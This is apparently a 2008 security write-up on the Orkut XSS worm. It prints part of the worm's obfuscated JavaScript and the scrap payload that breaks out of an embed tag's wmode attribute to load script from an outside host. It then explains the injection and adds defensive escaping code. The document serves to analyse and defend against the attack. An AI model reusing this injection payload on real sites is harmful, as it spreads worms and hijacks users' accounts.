
Technical Analysis of the Orkut XSS Worm

2008-01-01 00:58:13

Orkut is a popular social networking site with millions of registered users. A couple of days ago Orkut was hit with a worm that impacted close to 700,000 users in approximately 24 hours. We took a closer look at the exploit to get an idea of why so many users' systems were infected. The exploit was contained in a JavaScript file, aptly named "virus.js," which was injected using an embed tag. Here is a snippet of the JavaScript file:

// Dean Edwards "p,a,c,k,e,d" unpacker: $(...) rebuilds the real source from the packed string and the keyword table, and the surrounding setTimeout then evaluates it.
function $(p,a,c,k,e,d) { e=function(c) { return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36)) }; if(!''.replace(/^/,String)){ while(c--){d[e(c)]=k[c]||e(c)} k=[function(e){return d[e]}]; e=function(){return'\\w+'}; c=1 }; while(c--){ if(k[c]){ p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]) } } return p };

setTimeout(
$(5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();3.R(q,o://k.w.p/1P.z?1R=1S,C);
3.12(10-1e,Q/x-k-17-1b);3.a(a);3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};

We can see from the above code that the JavaScript is heavily obfuscated. After decoding and analyzing the strings in the script we confirmed that it is indeed targeting Orkut users. Our analysis of the decoded JavaScript showed that when the virus.js script is executed it forces the user to join a community called “Infectados pelo Vírus do Orkut”. The name of this community is in Portuguese and translates to “Infected by Virus Orkut.”

This is a novel way for the author of the worm to keep track of accounts infected by the worm. The script then loads the "friends list" of the infected Orkut account and sends them a malicious scrap. The worm uses Orkut scrap entries as its vector of propagation. Below is an example of the XML code to define the Orkut scrap:

2008 vem ai… que ele comece mto bem par avc <br/> [silver]RL Wed Dec 19 14:57:48 UTC+0530 2007[/silver] <br/> <embed src="http://www.orkut.com/LoL.aspx" type="application/x-shockwave-flash" wmode="transparent'); Script=document.createElement('script'); Script.src='http://files.myopera111.com/[REMOVED].js'; Document.getElementByTagname('head')[0].appendChild (script);escape('" width="1" height="1"> </embed>

When you look at the XML code, there are a few attributes on the embed tag, such as wmode, width, height, etc. The embed tag expects these attributes in order to create a Flash object to display the Flash content. Now when you look closely at the code, notice the wmode attribute:

wmode="transparent');

The author has closed the wmode value with '); and has added script code inside the attribute value itself. Let's analyze this further. We tested the script with a variant of the malicious scrap:

<embed src="http://www.orkut.com/LoL.aspx" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">

When Orkut parsed this scrapbook entry, we found it behaved in a similar way to the following code in an Orkut page:

<script type="text/javascript"> var flashWriter = new _SWFObject('http://www.orkut.com/LoL.aspx', '337533968', '1', '1', '9', '#FFFFFF', 'autohigh', '', '', '337533968'); flashWriter._addParam('wmode', 'transparent'); flashWriter._addParam('allowNetworking', 'internal'); flashWriter._addParam('allowScriptAccess', 'never'); flashWriter._setAttribute('style', ''); flashWriter._write('flashDiv337533968');</script>

The Orkut application parsed the scrap text and created the Flash object with the values specified in the scrap.
If we look at the source code generated for the malicious scrap, it looks like the sample below; the injected code is everything between the wmode value of the first _addParam call and the escape() call. Note that the escape function is added so that the closing quote and parenthesis Orkut appends still form valid JavaScript, which lets the malicious code be integrated cleanly:

flashWriter._addParam('wmode', 'transparent'); script = document.createElement('script'); script.src = 'http://files.myopera.com/virusd[REMOVED]'; document.getElementsByTagName('head')[0].appendChild(script); escape(''); flashWriter._addParam('allowNetworking', 'internal'); flashWriter._addParam('allowSc
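The injection described above, as an added example that is neither Orkut's code nor the original analysis's: a vulnerable template that pastes the scrap's wmode value into the generated _SWFObject JavaScript, the hardened template that emits a proper string literal instead, and a stub harness that shows what each rendered snippet does. The worm-shaped wmode value and the placeholder script URL are constructed for the example.

```javascript
// Added example (not Orkut's or the original analysis's code): models how a scrap
// attribute is pasted into the generated _SWFObject JavaScript, why the worm's wmode
// value breaks out of the string literal, and how a proper JS string literal stops it.

// Constructed wmode value shaped like the worm's; the script URL is a placeholder.
const WORM_WMODE =
  "transparent');script=document.createElement('script');" +
  "script.src='http://PLACEHOLDER.invalid/virus.js';" +
  "document.getElementsByTagName('head')[0].appendChild(script);escape('";

// Vulnerable template: the value lands between single quotes exactly as submitted.
function renderAddParamUnsafe(name, value) {
  return "flashWriter._addParam('" + name + "', '" + value + "');";
}

// Hardened template: JSON.stringify emits a JavaScript string literal with quotes,
// backslashes and control characters escaped, so the value cannot end the literal;
// escaping '<' and '>' also keeps it from closing the enclosing <script> element.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/</g, "\\u003c").replace(/>/g, "\\u003e");
}

function renderAddParamSafe(name, value) {
  return "flashWriter._addParam(" + jsStringLiteral(name) + ", " + jsStringLiteral(value) + ");";
}

// Execute a rendered snippet against stub objects and report what it actually did:
// the wmode value the Flash object received and how many <script> elements were
// appended to <head> (the worm's propagation step).
function simulate(snippet) {
  const params = {};
  let scriptsAppended = 0;
  const flashWriter = { _addParam: (k, v) => { params[k] = v; } };
  const head = { appendChild: () => { scriptsAppended += 1; } };
  const document = {
    createElement: (tag) => ({ tag, src: "" }),
    getElementsByTagName: (tag) => (tag === "head" ? [head] : []),
  };
  // new Function keeps the snippet out of this module's scope; only the stubs are passed in.
  new Function("flashWriter", "document", snippet)(flashWriter, document);
  return { wmode: params.wmode, scriptsAppended };
}

console.log(simulate(renderAddParamUnsafe("wmode", WORM_WMODE))); // wmode 'transparent', 1 script appended
console.log(simulate(renderAddParamSafe("wmode", WORM_WMODE)));   // whole string as wmode, 0 scripts appended
```

With the unsafe template the scrap value becomes three extra statements and a script element reaches the page; with the hardened template the entire value, quotes and all, is just the string handed to _addParam.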
